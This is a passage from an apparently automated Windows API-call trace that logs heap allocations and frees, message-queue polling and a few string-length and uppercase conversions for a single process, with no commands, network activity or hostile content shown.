HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72908 | out: hHeap=0x2af0000) returned 1 [0084.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec820 [0084.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a727b8 [0084.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a727b8 | out: hHeap=0x2af0000) returned 1 [0084.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec9b8 [0084.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72928 [0084.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72928 | out: hHeap=0x2af0000) returned 1 [0084.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec6d0 [0084.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72968 [0084.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec868 [0084.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec7d8 | out: hHeap=0x2af0000) returned 1 [0084.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec7c0 | out: hHeap=0x2af0000) returned 1 [0084.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec820 | out: hHeap=0x2af0000) returned 1 [0084.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec9b8 | out: hHeap=0x2af0000) returned 1 [0084.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec808 | out: hHeap=0x2af0000) returned 1 [0084.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726d8 | out: hHeap=0x2af0000) returned 1 [0084.204] lstrlenW (lpString="20") returned 2 [0084.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec6d0 | out: hHeap=0x2af0000) returned 1 [0084.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72968 | out: hHeap=0x2af0000) returned 1 [0084.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec868 | out: hHeap=0x2af0000) returned 1 [0084.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec910 | out: hHeap=0x2af0000) returned 1 [0084.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec988 | out: hHeap=0x2af0000) returned 1 [0084.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726c8 | out: hHeap=0x2af0000) returned 1 [0084.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec988 [0084.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec7c0 [0084.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726c8 [0084.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec7a8 | out: hHeap=0x2af0000) returned 1 [0084.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec598 | out: hHeap=0x2af0000) returned 1 [0084.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726b8 | out: hHeap=0x2af0000) returned 1 [0084.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec7c0 | out: hHeap=0x2af0000) returned 1 [0084.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726c8 | out: hHeap=0x2af0000) returned 1 [0084.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec988 | out: hHeap=0x2af0000) returned 1 [0084.205] PeekMessageW (in: lpMsg=0x8cefc8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cefc8) returned 0 [0084.205] PeekMessageW (in: lpMsg=0x8cefc8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cefc8) returned 0 [0084.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726b8 [0084.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec910 [0084.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec988 [0084.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726c8 [0084.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec868 [0084.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec7a8 [0084.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726d8 [0084.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec9b8 [0084.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec6d0 [0084.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72808 [0084.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec7c0 [0084.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72808 | out: hHeap=0x2af0000) returned 1 [0084.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec7d8 [0084.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72968 [0084.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72968 | out: hHeap=0x2af0000) returned 1 [0084.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec808 [0084.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72848 [0084.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72848 | out: hHeap=0x2af0000) returned 1 [0084.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec820 [0084.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72868 [0084.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec898 [0084.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec7c0 | out: hHeap=0x2af0000) returned 1 [0084.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec6d0 | out: hHeap=0x2af0000) returned 1 [0084.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec7d8 | out: hHeap=0x2af0000) returned 1 [0084.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec808 | out: hHeap=0x2af0000) returned 1 [0084.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec9b8 | out: hHeap=0x2af0000) returned 1 [0084.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726d8 | out: hHeap=0x2af0000) returned 1 [0084.206] lstrlenW (lpString="30") returned 2 [0084.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec820 | out: hHeap=0x2af0000) returned 1 [0084.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72868 | out: hHeap=0x2af0000) returned 1 [0084.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec898 | out: hHeap=0x2af0000) returned 1 [0084.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec7a8 | out: hHeap=0x2af0000) returned 1 [0084.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec868 | out: hHeap=0x2af0000) returned 1 [0084.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726c8 | out: hHeap=0x2af0000) returned 1 [0084.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec9b8 [0084.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec6d0 [0084.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726c8 [0084.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec988 | out: hHeap=0x2af0000) returned 1 [0084.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec910 | out: hHeap=0x2af0000) returned 1 [0084.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726b8 | out: hHeap=0x2af0000) returned 1 [0084.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec6d0 | out: hHeap=0x2af0000) returned 1 [0084.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726c8 | out: hHeap=0x2af0000) returned 1 [0084.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec9b8 | out: hHeap=0x2af0000) returned 1 [0084.206] PeekMessageW (in: lpMsg=0x8cefc8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cefc8) returned 0 [0084.206] PeekMessageW (in: lpMsg=0x8cefc8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cefc8) returned 0 [0084.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726b8 [0084.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec7a8 [0084.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec808 [0084.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726c8 [0084.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec7c0 [0084.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec910 [0084.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726d8 [0084.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec820 [0084.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec7d8 [0084.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728a8 [0084.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec868 [0084.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728a8 | out: hHeap=0x2af0000) returned 1 [0084.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec898 [0084.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72998 [0084.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72998 | out: hHeap=0x2af0000) returned 1 [0084.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec988 [0084.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0084.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0084.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec9b8 [0084.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a728e8 [0084.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec6d0 [0084.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec868 | out: hHeap=0x2af0000) returned 1 [0084.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec7d8 | out: hHeap=0x2af0000) returned 1 [0084.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec898 | out: hHeap=0x2af0000) returned 1 [0084.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec988 | out: hHeap=0x2af0000) returned 1 [0084.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec820 | out: hHeap=0x2af0000) returned 1 [0084.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726d8 | out: hHeap=0x2af0000) returned 1 [0084.207] lstrlenW (lpString="20") returned 2 [0084.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec9b8 | out: hHeap=0x2af0000) returned 1 [0084.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728e8 | out: hHeap=0x2af0000) returned 1 [0084.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec6d0 | out: hHeap=0x2af0000) returned 1 [0084.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec910 | out: hHeap=0x2af0000) returned 1 [0084.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec7c0 | out: hHeap=0x2af0000) returned 1 [0084.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726c8 | out: hHeap=0x2af0000) returned 1 [0084.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec988 [0084.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec910 [0084.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726c8 [0084.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec808 | out: hHeap=0x2af0000) returned 1 [0084.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec7a8 | out: hHeap=0x2af0000) returned 1 [0084.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726b8 | out: hHeap=0x2af0000) returned 1 [0084.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec910 | out: hHeap=0x2af0000) returned 1 [0084.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726c8 | out: hHeap=0x2af0000) returned 1 [0084.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec988 | out: hHeap=0x2af0000) returned 1 [0084.207] PeekMessageW (in: lpMsg=0x8cefc8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cefc8) returned 0 [0084.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0084.208] PeekMessageW (in: lpMsg=0x8cefc8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cefc8) returned 0 [0084.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726b8 [0084.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec7a8 [0084.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726b8 | out: hHeap=0x2af0000) returned 1 [0084.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec868 [0084.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec7a8 | out: hHeap=0x2af0000) returned 1 [0084.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec988 [0084.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec868 | out: hHeap=0x2af0000) returned 1 [0084.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0084.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec4f0 | out: hHeap=0x2af0000) returned 1 [0084.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec550 | out: hHeap=0x2af0000) returned 1 [0084.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6e860 | out: hHeap=0x2af0000) returned 1 [0084.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72678 | out: hHeap=0x2af0000) returned 1 [0084.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6e838 | out: hHeap=0x2af0000) returned 1 [0084.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec6a0 | out: hHeap=0x2af0000) returned 1 [0084.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec520 | out: hHeap=0x2af0000) returned 1 [0084.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72688 | out: hHeap=0x2af0000) returned 1 [0084.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6e888 | out: hHeap=0x2af0000) returned 1 [0084.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec658 | out: hHeap=0x2af0000) returned 1 [0084.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec5e0 | out: hHeap=0x2af0000) returned 1 [0084.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6eb08 | out: hHeap=0x2af0000) returned 1 [0084.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72768 | out: hHeap=0x2af0000) returned 1 [0084.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6e8d8 | out: hHeap=0x2af0000) returned 1 [0084.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec4c0 | out: hHeap=0x2af0000) returned 1 [0084.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72798 | out: hHeap=0x2af0000) returned 1 [0084.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec0d0 | out: hHeap=0x2af0000) returned 1 [0084.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec220 | out: hHeap=0x2af0000) returned 1 [0084.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec2e0 | out: hHeap=0x2af0000) returned 1 [0084.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec130 | out: hHeap=0x2af0000) returned 1 [0084.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72668 | out: hHeap=0x2af0000) returned 1 [0084.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec3b8 | out: hHeap=0x2af0000) returned 1 [0084.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72788 | out: hHeap=0x2af0000) returned 1 [0084.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec358 | out: hHeap=0x2af0000) returned 1 [0084.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec3b8 [0084.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec988 | out: hHeap=0x2af0000) returned 1 [0084.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec6d0 [0084.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec910 [0084.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72768 [0084.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6e838 [0084.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec9b8 [0084.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72678 [0084.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec9b8 | out: hHeap=0x2af0000) returned 1 [0084.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6e860 [0084.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec988 [0084.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec7a8 [0084.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726b8 [0084.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec6d0 | out: hHeap=0x2af0000) returned 1 [0084.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6e888 [0084.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72668 [0084.209] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0084.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6e888 | out: hHeap=0x2af0000) returned 1 [0084.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72668 | out: hHeap=0x2af0000) returned 1 [0084.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec9b8 [0084.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72788 [0084.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec6d0 [0084.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec820 [0084.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726c8 [0084.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72668 [0084.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72668 | out: hHeap=0x2af0000) returned 1 [0084.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec808 [0084.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726c8 | out: hHeap=0x2af0000) returned 1 [0084.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x29ec7c0 [0084.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6e888 [0084.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec7d8 [0084.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72688 [0084.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec7d8 | out: hHeap=0x2af0000) returned 1 [0084.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6e8d8 [0084.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec7d8 [0084.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec868 [0084.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0084.210] PeekMessageW (in: lpMsg=0x8cefc8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cefc8) returned 0 [0084.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec898 [0084.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726c8 [0084.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec898 | out: hHeap=0x2af0000) returned 1 [0084.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6ed10 [0084.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec898 [0084.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecac0 [0084.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72798 [0084.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6ef18 [0084.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec9d0 [0084.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72668 [0084.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec9d0 | out: hHeap=0x2af0000) returned 1 [0084.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6eae0 [0084.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec9d0 [0084.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecad8 [0084.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6ed10 | out: hHeap=0x2af0000) returned 1 [0084.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726c8 | out: hHeap=0x2af0000) returned 1 [0084.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec898 | out: hHeap=0x2af0000) returned 1 [0084.210] PeekMessageW (in: lpMsg=0x8cefc8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cefc8) returned 0 [0084.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6eef0 [0084.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec898 [0084.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726c8 [0084.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecaf0 [0084.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726d8 [0084.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726d8 | out: hHeap=0x2af0000) returned 1 [0084.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726d8 [0084.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecbc8 [0084.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecc70 [0084.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72998 [0084.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29eca18 [0084.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72998 | out: hHeap=0x2af0000) returned 1 [0084.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eca18 | out: hHeap=0x2af0000) returned 1 [0084.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecc70 | out: hHeap=0x2af0000) returned 1 [0084.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecbc8 | out: hHeap=0x2af0000) returned 1 [0084.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726d8 | out: hHeap=0x2af0000) returned 1 [0084.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726d8 [0084.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726d8 | out: hHeap=0x2af0000) returned 1 [0084.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0084.211] PeekMessageW (in: lpMsg=0x8cefc8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cefc8) returned 0 [0084.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726d8 [0084.211] RtlAllocateHeap (HeapHandle=0x2af0000, 